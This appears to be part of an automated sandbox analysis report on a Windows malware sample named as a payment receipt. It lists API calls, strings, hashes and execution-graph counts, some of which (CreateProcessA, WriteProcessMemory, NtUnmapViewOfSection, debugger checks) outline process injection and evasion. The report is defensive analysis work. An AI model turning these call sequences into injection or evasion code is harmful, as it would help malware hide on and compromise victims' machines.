                                                      • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                    • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CodeInfoPageValid
                                                    • String ID: *O"/
                                                    • API String ID: 546120528-463055101
                                                    • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                    • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                    • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                    • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                    APIs
                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Info
                                                    • String ID: $*O"/
                                                    • API String ID: 1807457897-2670824738
                                                    • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                    • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                    • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                    • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,10009C44,?,00000000,?,00000000,00000000), ref: 100098B1
                                                    • GetLastError.KERNEL32(?,10009C44,?,00000000,?,00000000,00000000,?,00000000), ref: 100098DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: *O"/
                                                    • API String ID: 442123175-463055101
                                                    • Opcode ID: 44c02fc31167cef82eb2c7325f1918f2fa4c78e7bb82f98d2e24cadcd22c2269
                                                    • Instruction ID: 10ae1692938ef1c10bc5cabf9f53a2a3bd6999d6216ca289fae0ab6df1a73c16
                                                    • Opcode Fuzzy Hash: 44c02fc31167cef82eb2c7325f1918f2fa4c78e7bb82f98d2e24cadcd22c2269
                                                    • Instruction Fuzzy Hash: 94316171A002199BDB24CF59CC80AD9B3F9FF49350F2185AAE519D7360DB30E985CB50
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,10009C64,?,00000000,?,00000000,00000000), ref: 100097C3
                                                    • GetLastError.KERNEL32(?,10009C64,?,00000000,?,00000000,00000000,?,00000000), ref: 100097EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: *O"/
                                                    • API String ID: 442123175-463055101
                                                    • Opcode ID: 2f97b0ea3d2111d9094b6cf8e2123f0946c90a3f737484b600376bf3188e4d44
                                                    • Instruction ID: 38868272ab1662a5a2ad023a6230b7ecc66e9b3593444bcc3211b27e9ed8cf09
                                                    • Opcode Fuzzy Hash: 2f97b0ea3d2111d9094b6cf8e2123f0946c90a3f737484b600376bf3188e4d44
                                                    • Instruction Fuzzy Hash: DC21B136A14219DFEB15CF59C884BDAB3F8EB48381F1044AAE94AD7251D730ED81CB20
                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 10005CA5
                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AddressProc__crt_fast_encode_pointer
                                                    • String ID: *O"/
                                                    • API String ID: 2279764990-463055101
                                                    • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                    • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                    • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                    • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: : $Se.
                                                    • API String ID: 4218353326-4089948878
                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                    • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                    • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10002B4F
                                                    • ___raise_securityfailure.LIBCMT ref: 10002C36
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                    • String ID: *O"/
                                                    • API String ID: 3761405300-463055101
                                                    • Opcode ID: 70e6b92d4ff8390b97530531c8a31b2bf75f1acffc31a4c733281a71a18183d0
                                                    • Instruction ID: 3e738cf41e4fedca429440b27c5ceba6e76d410b83429fe86edfa1b27721cda5
                                                    • Opcode Fuzzy Hash: 70e6b92d4ff8390b97530531c8a31b2bf75f1acffc31a4c733281a71a18183d0
                                                    • Instruction Fuzzy Hash: 2F21BEB8512361AAF714CF15DED1B44BBE4FB48764F10C02AE9089A3A0E7B0D581CF55
                                                    APIs
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                      • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                    • String ID: Unknown exception
                                                    • API String ID: 3476068407-410509341
                                                    • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                    • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                    • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                    • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                    APIs
                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: String
                                                    • String ID: *O"/$LCMapStringEx
                                                    • API String ID: 2568140703-155514726
                                                    • Opcode ID: 7a47d43865ba002eab841ac63f0264426d0741ac74f7406fba362a09800a18bf
                                                    • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                    • Opcode Fuzzy Hash: 7a47d43865ba002eab841ac63f0264426d0741ac74f7406fba362a09800a18bf
                                                    • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 10005F02
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalInitializeSectionSpin
                                                    • String ID: *O"/$InitializeCriticalSectionEx
                                                    • API String ID: 2593887523-1713330641
                                                    • Opcode ID: 239e2963de0d6cd0752a7905e87955d260eca2173f5729cc2670a532fb8154a9
                                                    • Instruction ID: 674605c196627833912876511d98c7499c33f247a669ee446c9f59910835c79f
                                                    • Opcode Fuzzy Hash: 239e2963de0d6cd0752a7905e87955d260eca2173f5729cc2670a532fb8154a9
                                                    • Instruction Fuzzy Hash: B0F0B43154011CBBFB159F50CC00DEE7F61DB183D1B108025FD0966164CF32AD10AAA4
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Alloc
                                                    • String ID: *O"/$FlsAlloc
                                                    • API String ID: 2773662609-2036727898
                                                    • Opcode ID: a4c1784f5932adb522d2ca488d7768f2f935f19ba84bde8ccc2372c69ff9f61f
                                                    • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                    • Opcode Fuzzy Hash: a4c1784f5932adb522d2ca488d7768f2f935f19ba84bde8ccc2372c69ff9f61f
                                                    • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Free
                                                    • String ID: *O"/$FlsFree
                                                    • API String ID: 3978063606-262826712
                                                    • Opcode ID: 266330d642cf3eee4d4242d0d615bdc8a312c100e9c677cf1b977f31c441131a
                                                    • Instruction ID: b54f93d543b27d774a413c601eeb0e62583d490719bbc6bc30dd5d2f1f1d8414
                                                    • Opcode Fuzzy Hash: 266330d642cf3eee4d4242d0d615bdc8a312c100e9c677cf1b977f31c441131a
                                                    • Instruction Fuzzy Hash: B8E0E571A00128ABF321EB648C15EEFBBA0CB09BC1B00416AFE0667209CE325D0096E6

                                                    Execution Graph

                                                    Execution Coverage:12%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:220
                                                    Total number of Limit Nodes:15

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 02C2D5DE
                                                    • GetCurrentThread.KERNEL32 ref: 02C2D61B
                                                    • GetCurrentProcess.KERNEL32 ref: 02C2D658
                                                    • GetCurrentThreadId.KERNEL32 ref: 02C2D6B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2114141091.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_2c20000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID: PpTZ
                                                    • API String ID: 2063062207-3956381780
                                                    • Opcode ID: 89130409a651a13737b06a33138222c9c951771bf4bbf95c3aaa0dfcab194077
                                                    • Instruction ID: 4209697748b68817090e14a9b9fc39f87b297bc5ae9ec7396b5a966984a75671
                                                    • Opcode Fuzzy Hash: 89130409a651a13737b06a33138222c9c951771bf4bbf95c3aaa0dfcab194077
                                                    • Instruction Fuzzy Hash: A55154B09002498FDB14DFA9D548BEEBBF5FF88304F208559E019A7360DB38A944CF65

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0779AA2E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID: PpTZ$PpTZ
                                                    • API String ID: 963392458-3159420145
                                                    • Opcode ID: bfcd4cb6a7c582c7145272a82cf72971f65b445370d905f90c8b0e595fde31cf
                                                    • Instruction ID: 2893c7c4ac6f5e58e757273421376d1b832f966fc56f9922c66ad089209fc928
                                                    • Opcode Fuzzy Hash: bfcd4cb6a7c582c7145272a82cf72971f65b445370d905f90c8b0e595fde31cf
                                                    • Instruction Fuzzy Hash: A4A14AB1D0221ACFDF24CF68D841BEDBBB2BF48354F15856AD809A7240DB749986CF91

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0779AA2E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID: PpTZ$PpTZ
                                                    • API String ID: 963392458-3159420145
                                                    • Opcode ID: 86c79da637512c8d5b8aa7b51bb4e6640ea7387e6932a9bef42bc6db082e6987
                                                    • Instruction ID: 35ed9487805bb03ad8f6aa8676f261585f88df92fee6b66711cf8879d81233ac
                                                    • Opcode Fuzzy Hash: 86c79da637512c8d5b8aa7b51bb4e6640ea7387e6932a9bef42bc6db082e6987
                                                    • Instruction Fuzzy Hash: BA9149B1D0221ACFDF24CF68D841BEDBBB2BF48354F1585AAD809A7240DB749985CF91
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 075800D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121699449.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7580000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID: PpTZ
                                                    • API String ID: 2175133113-3956381780
                                                    • Opcode ID: 914de044e32f82d681f2cd2a39053c6b85492a574b0af0348d64a5be89a5a74b
                                                    • Instruction ID: 2d4f4dc1c72881f5b04ca8f1f9f773cbf9ee09f78d7bdc2dc9de2784349f9a41
                                                    • Opcode Fuzzy Hash: 914de044e32f82d681f2cd2a39053c6b85492a574b0af0348d64a5be89a5a74b
                                                    • Instruction Fuzzy Hash: B23145B29053499FDB01CFA9D840ADEBFF4FF09220F14845AE458E7251C779A944CBA0
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02C259C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2114141091.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_2c20000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID: PpTZ
                                                    • API String ID: 2289755597-3956381780
                                                    • Opcode ID: 37b4cbe7ecfcfd1992fd9d529d371de41c47382e77aa211529bc573fcabc6c39
                                                    • Instruction ID: 6e659c4d0c250469454804a69d15acb183e28a3a1bc399e7587e7913825ed563
                                                    • Opcode Fuzzy Hash: 37b4cbe7ecfcfd1992fd9d529d371de41c47382e77aa211529bc573fcabc6c39
                                                    • Instruction Fuzzy Hash: 6041D4B0C00719CBDB25DFA9C844BDEBBB5BF49304F60806AD409AB255DB75594ACF90
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02C259C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2114141091.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_2c20000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID: PpTZ
                                                    • API String ID: 2289755597-3956381780
                                                    • Opcode ID: d0c8a054cba482493849b0b714d528f3712e2d98262b6cf16e7b18b1b1495c3d
                                                    • Instruction ID: 6e394b5b88623a1b2252975139330a7b8f716afaa4bd11f27725985f1cc9cca3
                                                    • Opcode Fuzzy Hash: d0c8a054cba482493849b0b714d528f3712e2d98262b6cf16e7b18b1b1495c3d
                                                    • Instruction Fuzzy Hash: 5241F3B0C00719CEDB28DFA9C885BDEBBF5BF48304F64806AD409AB255DB75594ACF90
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0779A600
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID: PpTZ
                                                    • API String ID: 3559483778-3956381780
                                                    • Opcode ID: 1cd55c9b44b86fc4bc9f79ce01215f1f083809b2ef6d580d5cf20fc98c10a20c
                                                    • Instruction ID: 3c2ccdc7ec1a5f97d217e0ae18f35f87bf9989ffa026582d864368cf65c04bef
                                                    • Opcode Fuzzy Hash: 1cd55c9b44b86fc4bc9f79ce01215f1f083809b2ef6d580d5cf20fc98c10a20c
                                                    • Instruction Fuzzy Hash: B22115B59012599FCF10CFA9D885BEEBFF5FF48314F10882AE959A7240C7789945CBA0
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 075800D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121699449.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7580000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID: PpTZ
                                                    • API String ID: 2175133113-3956381780
                                                    • Opcode ID: e1007928de832b4e1756f7ff51471e99ae28d7420d17506c9ddd9ba0f503f013
                                                    • Instruction ID: 83ebf4fd041c89ba97289c9cf21c8a4019d4bea46d986af283aae92b45c2c4f1
                                                    • Opcode Fuzzy Hash: e1007928de832b4e1756f7ff51471e99ae28d7420d17506c9ddd9ba0f503f013
                                                    • Instruction Fuzzy Hash: 8B21E3B59012099FDB10DF9AD880ADEFBF4FB48310F14842AE819A7250C375A544CFA0
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0779A600
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Instruction ID: 18eb85158a1ae7f8a656bf4f15cdb189ec6e58371983b276bcdbd6a2971bdb85
                                                    • Opcode Fuzzy Hash: 7ee51301e400401bdaf590fd3d7fea7a0589cc98e5c4455fb70adf43f1facffe
                                                    • Instruction Fuzzy Hash: C6212EB0E003498EDB20DF9AC4497AEBFF8EB08754F24841AD519A7380C3B86585CFA5
                                                    APIs
                                                    • GetSystemMetrics.USER32(00000005), ref: 060A033E
                                                    • GetSystemMetrics.USER32(00000006), ref: 060A0378
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2120791871.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_60a0000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID: PpTZ
                                                    • API String ID: 4116985748-3956381780
                                                    • Opcode ID: 45c0ca7904f1e1782d58dc88fe325d920dda8b90819475928b78d797faee486f
                                                    • Instruction ID: f2a26cb4f0d19ccb04f4a3ccce496fb389c333300991fb785b719bb095d3934b
                                                    • Opcode Fuzzy Hash: 45c0ca7904f1e1782d58dc88fe325d920dda8b90819475928b78d797faee486f
                                                    • Instruction Fuzzy Hash: 41212EB1D003498FDB60DF9AC449BAEBFF8EB08354F24841AD559A7290C3B96584CFA5
                                                    APIs
                                                    • GetSystemMetrics.USER32(00000022), ref: 060AA906
                                                    • GetSystemMetrics.USER32(00000023), ref: 060AA940
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2120791871.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_60a0000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID: PpTZ
                                                    • API String ID: 4116985748-3956381780
                                                    • Opcode ID: 1877ce7bb6ee42076c220d6f192e5ca0de051e8f75518e7290c0e87a7cd43501
                                                    • Instruction ID: 557971305f4be970d29c5bb62a4fe7c9f2dfec419c361c6fefbc37aa2b59b8a5
                                                    • Opcode Fuzzy Hash: 1877ce7bb6ee42076c220d6f192e5ca0de051e8f75518e7290c0e87a7cd43501
                                                    • Instruction Fuzzy Hash: CD212EB0E003098FDB60DF9AC5497AEFFF4EB08314F24841AD559A7280C3B96584CFA5

                                                    Execution Graph

                                                    Execution Coverage:0.8%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:2.6%
                                                    Total number of Nodes:464
                                                    Total number of Limit Nodes:19
execution_graph: the interactive graph (464 nodes, 19 limit nodes) does not survive as text; its serialized node/edge list is omitted here. Windows API calls that appear as nodes in the graph, in the order they occur: GetModuleHandleW, GetLastError, SetLastError, RtlAllocateHeap, WaitForSingleObject, SetEvent, CloseHandle, closesocket, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, LoadLibraryA, GetProcAddress, GetModuleHandleA, GetModuleFileNameW, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, CreateProcessA, CreateMutexA, CreateThread, StrToIntA, DeleteFileW, Sleep, RegOpenKeyExW, RegDeleteValueW, FindResourceA, LoadResource, LockResource, SizeofResource, GetCurrentProcess, TerminateProcess, ExitProcess, GetPEB, GetModuleHandleExW, FreeLibrary, LoadLibraryExW.

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
